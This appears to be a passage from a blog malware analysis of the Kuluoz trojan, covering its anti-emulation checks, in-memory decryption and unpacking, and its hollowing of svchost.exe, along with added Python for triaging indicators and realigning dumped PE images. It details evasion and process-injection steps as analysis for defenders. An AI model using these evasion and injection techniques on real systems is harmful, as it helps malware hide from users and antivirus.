<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAUIoaoDrz5d2Rap6RVsaZwPJR0Py0uaMdpa7NeuGNq3NiDlWRMY8ElMn54JQ7IJTRreW5ZT3jYF7bcVsITfiAEANFWIN4v48llp5D9vB6jHdmJUh7a002wi-JNyQrnaVkPTB959iX/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAUIoaoDrz5d2Rap6RVsaZwPJR0Py0uaMdpa7NeuGNq3NiDlWRMY8ElMn54JQ7IJTRreW5ZT3jYF7bcVsITfiAEANFWIN4v48llp5D9vB6jHdmJUh7a002wi-JNyQrnaVkPTB959iX/s1600/3.png" height="131" width="320" /></a></div>
<div align="center" class="MsoNoSpacing" style="margin-left: .5in; text-align: center;">
<i><span lang="EN-US"><span style="font-weight: normal;"><span style="font-size: small;">Copy of SVCHOST.EXE
injected with kuluoz</span></span><o:p></o:p></span></i></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
</h2>
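Checking a host snapshot for the three indicators above, as an added example that is not part of the original post (the process list, Run-key values and the file name are constructed; the svchost.exe parent check is the "running under Explorer.exe" indicator generalised to "parent is not services.exe"):

```python
"""Triage constructed host evidence for the three Kuluoz indicators listed above."""
import re
from typing import Dict, List, Tuple

# Indicator 1: <profile>\Local Settings\Application Data\<8 lowercase letters>.exe
DROPPER_DIR = re.compile(r"\\local settings\\application data\\([^\\]+)$", re.IGNORECASE)
DROPPER_NAME = re.compile(r"[a-z]{8}\.exe")   # case-sensitive on purpose

Process = Tuple[int, int, str]   # (pid, ppid, image path)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (quotes around the path are ignored)."""
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def is_dropper_path(path: str) -> bool:
    """True if the path matches the dropped-copy location and naming scheme."""
    m = DROPPER_DIR.search(path.strip('"'))
    return m is not None and DROPPER_NAME.fullmatch(m.group(1)) is not None


def triage(processes: List[Process], run_values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (indicator, detail) pairs for evidence matching the post's IOCs.

    Indicator 3 is an svchost.exe whose parent is not services.exe (the post
    shows it under Explorer.exe, which is where the hollowed copy appears).
    """
    findings: List[Tuple[str, str]] = []
    by_pid = {pid: (ppid, image) for pid, ppid, image in processes}
    for pid, ppid, image in processes:
        if basename(image) == "svchost.exe":
            parent = basename(by_pid[ppid][1]) if ppid in by_pid else "<unknown>"
            if parent != "services.exe":
                findings.append(("svchost_parent",
                                 f"pid {pid} svchost.exe spawned by {parent} (pid {ppid})"))
        if is_dropper_path(image):
            findings.append(("dropper_process", f"pid {pid} running {image}"))
    # Indicator 2: a Run value pointing at the dropped copy
    for value_name, command in run_values.items():
        if is_dropper_path(command):
            findings.append(("run_key", f"HKCU\\...\\CurrentVersion\\Run\\{value_name} -> {command}"))
    return findings


# Constructed evidence (not from a real host): a snapshot of running processes
# and the HKCU Run key, with one hollowed svchost.exe and one dropped copy.
SAMPLE_PROCESSES: List[Process] = [
    (4, 0, "System"),
    (480, 4, r"C:\WINDOWS\system32\winlogon.exe"),
    (600, 480, r"C:\WINDOWS\system32\services.exe"),
    (820, 600, r"C:\WINDOWS\system32\svchost.exe"),       # legitimate service host
    (1400, 480, r"C:\WINDOWS\Explorer.EXE"),
    (2212, 1400, r"C:\WINDOWS\system32\svchost.exe"),     # hollowed copy under Explorer
    (2300, 1400, r"C:\Documents and Settings\user\Local Settings\Application Data\kdjfhqwe.exe"),
]
SAMPLE_RUN_VALUES: Dict[str, str] = {
    "kdjfhqwe": r'"C:\Documents and Settings\user\Local Settings\Application Data\kdjfhqwe.exe"',
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
}

if __name__ == "__main__":
    for indicator, detail in triage(SAMPLE_PROCESSES, SAMPLE_RUN_VALUES):
        print(f"[{indicator}] {detail}")
```

On a live host, feed it the output of a process-list tool and an export of the Run key; a single svchost.exe under a non-services.exe parent is worth a look on its own, since the hollowed copy is otherwise indistinguishable from the real binary by path.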
<h3>
<span lang="EN-US"><span style="font-size: large;">Breaking Into Bits and Pieces </span></span></h3>
<h4>
<i><span lang="EN-US" style="font-family: inherit;">UNPACKING ROUTINE:</span></i></h4>
<h2>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The unpacker section of kuluoz needs to
meet two conditions in order to properly continue its execution.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US"><span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The first is the existence of
“HKEY_CLASSES_ROOT\typelib\{640d3148-a423-11d2-b943-00c04f79d22f}\1.0” in
the registry. If it is not found, the Trojan terminates itself.</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOgbCUZz8LS91QEUWzo6bQ97oiDCoqNvE74XbFgx1T4WVWTF_hmvGcrHLF0vI6YXsExasF3WabzTowtbuxSq2aMPV2X8-4wJDsanxBRcI8YTiNBgZOdmaZN59UPtooDkOD08baG7Nx/s1600/Checks+for+a+specific+registry+entry.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOgbCUZz8LS91QEUWzo6bQ97oiDCoqNvE74XbFgx1T4WVWTF_hmvGcrHLF0vI6YXsExasF3WabzTowtbuxSq2aMPV2X8-4wJDsanxBRcI8YTiNBgZOdmaZN59UPtooDkOD08baG7Nx/s1600/Checks+for+a+specific+registry+entry.png" height="42" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Checks for a specific
registry entry<o:p></o:p></span></span></i></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The second is that the height, in pixels, of the
full-screen window on the target machine’s primary monitor must be greater
than 500 pixels.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWc0q3IuDAfsdqjb-ZxcVVJ0xC-XKrKxzU1FCJVGboQdz-YGBKChYNnPyKuaMBLVp84jJROelUD1NhFzwHjlzBOiljSQ7_xmRNpb-rxVcHigsnaYvWXHa3d2OvtRGTgbb_BMDN3vjx/s1600/Checks+screen+height+if+greater+than+500+pixels.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWc0q3IuDAfsdqjb-ZxcVVJ0xC-XKrKxzU1FCJVGboQdz-YGBKChYNnPyKuaMBLVp84jJROelUD1NhFzwHjlzBOiljSQ7_xmRNpb-rxVcHigsnaYvWXHa3d2OvtRGTgbb_BMDN3vjx/s1600/Checks+screen+height+if+greater+than+500+pixels.png" height="44" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Checks screen height if
greater than 500 pixels<o:p></o:p></span></span></i></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Then what happens if the height of the window
falls short of 500 pixels? A debug exception occurs, and again the Trojan
terminates.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">You might ask, "What is
the purpose of these two checks?" The simple answer is that kuluoz
assumes some antivirus engines will fail to emulate these decoy API calls
correctly, and so it bypasses their heuristic/generic detections.</span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">An encrypted blob within its body
(starting at 0x40F003, 0x12300 bytes in size) is then copied into a region
allocated with <i>VirtualAlloc</i> and decrypted there, after which execution is
transferred to it.</span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then obtains the image base of
kernel32.dll by reading it from the <a href="http://en.wikipedia.org/wiki/Win32_Thread_Information_Block">Win32 Thread
Information Block</a> (TIB), and uses that image base to populate its own API
table.</span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The APIs resolved this way are
listed below.</span></span></div>
<ul>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualAlloc</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">UnmapViewOfFile</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualProtect</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">LoadLibraryExA</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetModuleHandleA</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateFileA</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">SetFilePointer</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WriteFile</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CloseHandle</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetTempPathA</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">lstrlenA</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">lstrcatA</span></span></li>
</ul>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Once again, it will make use of <i>VirtualAlloc </i>to
allocate a memory region for itself to copy and decrypt a part of its code.
This time the data that is decrypted in memory contains an MZ-PE header.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyFFPiV396e5l7gcoM-i7Qls96brgkwgwEOsM1LHUdn1KUSX2e3wpPrp7CLw2_F-1UZrbVPRM5wZgjkKfB5X_KErJ1Ibjh0Oxvn5tZp3fm9aPwG4v6amcqLhyphenhyphenFkhLDe4zConRFwCGb/s1600/An+MZ-PE+file+copied+and+decrypted+in+memory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyFFPiV396e5l7gcoM-i7Qls96brgkwgwEOsM1LHUdn1KUSX2e3wpPrp7CLw2_F-1UZrbVPRM5wZgjkKfB5X_KErJ1Ibjh0Oxvn5tZp3fm9aPwG4v6amcqLhyphenhyphenFkhLDe4zConRFwCGb/s1600/An+MZ-PE+file+copied+and+decrypted+in+memory.png" height="104" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">An MZ-PE file copied and
decrypted in memory<o:p></o:p></span></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"> <o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then proceeds to fix the import table
of that PE file in memory and resolves the addresses of the following APIs
that it needs to use:</span></span></div>
<ul>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WaitForSingleObject</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateEventA</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualAlloc</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateProcessA</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetProcAddress</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetModuleHandleA</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CloseHandle</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ReleaseMutex</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">TerminateProcess</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetCurrentProcess</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetLastError</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateMutexA</span></span></li>
</ul>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">This newly decrypted PE file is then
written over the memory region of the original executable before execution is
transferred to it.</span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-size: small;">Dump this region to a new file and you
have an unprotected version of Kuluoz!</span></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
</h2>
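Turning such a dump into a loadable file, as an added example that is neither the author's code nor anything from Kuluoz: it applies the usual raw-equals-virtual fix-up to a constructed PE32 image whose section headers still carry the packed file's raw offsets, and assumes the region was dumped starting at the image base.

```python
"""Rebuild a file-layout PE from a memory dump (constructed example, not Kuluoz data)."""
import struct

FILE_HDR = 20      # sizeof(IMAGE_FILE_HEADER)
SECTION_HDR = 40   # sizeof(IMAGE_SECTION_HEADER)


def _align_up(value: int, alignment: int) -> int:
    return (value + alignment - 1) // alignment * alignment


def pe_layout(image: bytes) -> dict:
    """Locate the optional header and section table; works on memory or file layout."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    opt_off = e_lfanew + 4 + FILE_HDR
    sec_align, file_align = struct.unpack_from("<II", image, opt_off + 32)
    return {"opt_off": opt_off, "sec_off": opt_off + opt_size, "num_sections": num_sections,
            "section_alignment": sec_align, "file_alignment": file_align}


def section_table(image: bytes) -> list:
    """[(name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData), ...]"""
    lay = pe_layout(image)
    rows = []
    for i in range(lay["num_sections"]):
        off = lay["sec_off"] + i * SECTION_HDR
        name = bytes(image[off:off + 8]).rstrip(b"\0").decode("ascii", "replace")
        rows.append((name,) + struct.unpack_from("<IIII", image, off + 8))
    return rows


def read_section_raw(pe: bytes, name: str) -> bytes:
    """Read a section the way a file parser does: via PointerToRawData/SizeOfRawData."""
    for sname, vsize, _, rsize, rptr in section_table(pe):
        if sname == name:
            return bytes(pe[rptr:rptr + min(vsize, rsize)])
    raise KeyError(name)


def realign_memory_dump(image: bytes) -> bytes:
    """Make a memory-layout image loadable as a file.

    In memory, sections sit at VirtualAddress (SectionAlignment apart), but the
    headers still carry the packed file's PointerToRawData/SizeOfRawData, so a
    parser reading the dump lands in the wrong place. Setting raw == virtual and
    FileAlignment == SectionAlignment makes the headers describe the dump itself.
    """
    buf = bytearray(image)
    lay = pe_layout(buf)
    align = lay["section_alignment"]
    struct.pack_into("<I", buf, lay["opt_off"] + 36, align)       # FileAlignment
    end = 0
    for i in range(lay["num_sections"]):
        off = lay["sec_off"] + i * SECTION_HDR
        vsize, vaddr = struct.unpack_from("<II", buf, off + 8)
        rsize = _align_up(vsize, align)
        struct.pack_into("<II", buf, off + 16, rsize, vaddr)      # SizeOfRawData, PointerToRawData
        end = max(end, vaddr + rsize)
    struct.pack_into("<I", buf, lay["opt_off"] + 56, end)         # SizeOfImage
    buf.extend(b"\0" * (end - len(buf)))                          # pad a dump that stops short
    return bytes(buf[:end])


def build_sample_image() -> bytes:
    """Constructed PE32 as it would look in memory after the unpacker wrote it over
    the original image: headers at 0, .text at RVA 0x1000, .data at RVA 0x2000,
    while the section headers still carry the file offsets 0x400 and 0x600."""
    sections = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, filler
        (b".text", 0x180, 0x1000, 0x200, 0x400, b"TEXT"),
        (b".data", 0x040, 0x2000, 0x200, 0x600, b"DATA"),
    ]
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                           # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                         # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                   # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x400)                   # SizeOfImage, SizeOfHeaders
    headers = bytearray(dos + coff + opt)
    for name, vsize, vaddr, rsize, rptr, _ in sections:
        headers += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, vaddr, rsize, rptr,
                                                      0, 0, 0, 0, 0x60000020)
    image = bytearray(0x3000)
    image[:len(headers)] = headers
    for _, vsize, vaddr, _, _, filler in sections:
        image[vaddr:vaddr + vsize] = (filler * (vsize // 4 + 1))[:vsize]
    return bytes(image)


if __name__ == "__main__":
    dumped = realign_memory_dump(build_sample_image())
    for row in section_table(dumped):
        print(row)
```

The import table still has to be rebuilt separately, which is why the post lists the APIs the sample resolves after decryption.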
<h4>
<i><span lang="EN-US"><span style="font-family: inherit; font-size: small;">PROCESS INJECTION
(INJECTING THE MODULE):</span></span></i></h4>
<h2>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Kuluoz creates a mutex named
“2GVWNQJz1” to prevent a second instance of itself from running in memory.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScUajZOiDJJV51Yqshw_P7oh6gN0-_rO4e8zVLp6QkzONqGKpMqeBhR6Ae8k5URSogSLYW8bNaJqzOsjlf7Sw9gfIETOmlYTdbjz81n1TZVtYZvg4QG9fpcY0MJQ0tmA9KVDgofLL/s1600/%25E2%2580%259C2GVWNQJz1%25E2%2580%259D+as+mutex+name.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScUajZOiDJJV51Yqshw_P7oh6gN0-_rO4e8zVLp6QkzONqGKpMqeBhR6Ae8k5URSogSLYW8bNaJqzOsjlf7Sw9gfIETOmlYTdbjz81n1TZVtYZvg4QG9fpcY0MJQ0tmA9KVDgofLL/s1600/%25E2%2580%259C2GVWNQJz1%25E2%2580%259D+as+mutex+name.png" height="23" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">“2GVWNQJz1” as mutex name<o:p></o:p></span></span></i></div>
<div class="MsoNormal" style="text-indent: .25in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then proceeds to gather all the
necessary APIs that it needs, which are listed below:<o:p></o:p></span></span></div>
<ul>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">NtQueryInformationProcess</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwReadVirtualMemory</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwMapViewOfSection</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">NtCreateSection</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwUnmapViewOfSection</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwResumeThread</span></span></li>
</ul>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Next, it injects a portion of its DLL
code into a normal process, “SVCHOST.EXE”. By doing so, kuluoz stays memory
resident without the user noticing.</span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">I will explain in detail how this
process injection is done.<o:p></o:p></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><span lang="EN-US">First, it spawns a suspended process of
svchost.exe in memory using <i>CreateProcessA</i>.</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbvs9XTGgHQqLizDglXj_ikOrxbkF04tGeU6Xu10SpJ6lVBqq_wOrrtHc7u5nb0w7-wCkJfpw07cQ1TlZKV4I6eyGVyskTi-DdMy_cGN8qJSSXdTp58q-kAUXzctSLzvlALkMuk58Y/s1600/Create+suspended+process+of+svchost.exe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbvs9XTGgHQqLizDglXj_ikOrxbkF04tGeU6Xu10SpJ6lVBqq_wOrrtHc7u5nb0w7-wCkJfpw07cQ1TlZKV4I6eyGVyskTi-DdMy_cGN8qJSSXdTp58q-kAUXzctSLzvlALkMuk58Y/s1600/Create+suspended+process+of+svchost.exe.png" height="46" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><i><span lang="EN-US">Create suspended process of
svchost.exe</span></i><span lang="EN-US"><o:p></o:p></span></span></span></div>
<div class="MsoNoSpacing">
<span style="font-weight: normal;"><span style="font-size: small;"><span lang="EN-US" style="font-family: inherit;"><br /></span></span></span></div>
<div class="MsoNoSpacing">
<span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><span lang="EN-US">Next, it creates a memory section
using <i>ZwCreateSection</i> and maps a view of it using <i>ZwMapViewOfSection</i> in order to copy a portion
of its code to memory address 0x00090000.</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ljPK3YEgoElAvrzMCG0h_lStloKWvC0FvVAhFzpxI06PVaKff__tWjfxxial9hRANgCm7QG6NL9yj4YA5VMPSM5IYNGA-6KSGXfVn9zBn2ieaBmsE_CLgNQZnVIk_GBtR3Y7Mojz/s1600/A+portion+of+kuluoz+code+copied+in+memory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ljPK3YEgoElAvrzMCG0h_lStloKWvC0FvVAhFzpxI06PVaKff__tWjfxxial9hRANgCm7QG6NL9yj4YA5VMPSM5IYNGA-6KSGXfVn9zBn2ieaBmsE_CLgNQZnVIk_GBtR3Y7Mojz/s1600/A+portion+of+kuluoz+code+copied+in+memory.png" height="245" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">A portion of kuluoz code
copied in memory<o:p></o:p></span></span></i></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><span lang="EN-US">It then allocates another memory region
into which it copies the svchost.exe data using</span><span class="apple-converted-space"><span lang="EN-US"> </span></span><i><span lang="EN-US">ZwReadVirtualMemory.</span></i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0E9O41sVyh-pXwDifZMWMwHLqNDJmjXxdTL40ItxJIOoVBAa6dcIMaKp8MhsGJXRopSdkCgo-rjaSPKgyWdJkmowGINB-WjMRu-sikLLUoqNWeJ7cr7d7YoTwLFZEHzfiqTGhKA5F/s1600/svchost.exe+copied+in+memory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0E9O41sVyh-pXwDifZMWMwHLqNDJmjXxdTL40ItxJIOoVBAa6dcIMaKp8MhsGJXRopSdkCgo-rjaSPKgyWdJkmowGINB-WjMRu-sikLLUoqNWeJ7cr7d7YoTwLFZEHzfiqTGhKA5F/s1600/svchost.exe+copied+in+memory.png" height="240" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">svchost.exe copied in
memory<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then locates the entry point of
svchost.exe in memory and overwrites it with the following instructions, which
jump to its malicious code.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFem4Bv2QKLVfQNP-2YAYuzzE2biT74XGBxsKdF-g4HvnfyTou9cVjaft4pBoezeD-AtvCV1lf4889YSIbolFn24sPMn3-LCCBRsmFlGhzUjB76Hzd423L7nJU2_f8O1uHqnh91W_o/s1600/Entry+point+of+svchost.exe+overwritten+to+point+to+malware+code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFem4Bv2QKLVfQNP-2YAYuzzE2biT74XGBxsKdF-g4HvnfyTou9cVjaft4pBoezeD-AtvCV1lf4889YSIbolFn24sPMn3-LCCBRsmFlGhzUjB76Hzd423L7nJU2_f8O1uHqnh91W_o/s1600/Entry+point+of+svchost.exe+overwritten+to+point+to+malware+code.png" height="23" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Entry point of svchost.exe
overwritten to point to malware code<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Bingo! From the image above we can see
that kuluoz wants execution to continue at address 0x00090000, which holds
the malicious routines that were mapped earlier.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">After that, it copies the
modified svchost.exe image into another memory region before unmapping,
preserving all the modifications made to the svchost.exe image loaded in
memory.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then makes use of<span class="apple-converted-space"> </span><i>CreateEventA</i><span class="apple-converted-space"> </span>to create an event with a string name
of “y76gDDb3”.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">Finally, the suspended
svchost.exe process is resumed by calling<span class="apple-converted-space"> </span><i>ZwResumeThread</i>.</span></span><span lang="EN-US" style="font-size: 13.5pt;"><o:p></o:p></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
</h2>
<h4>
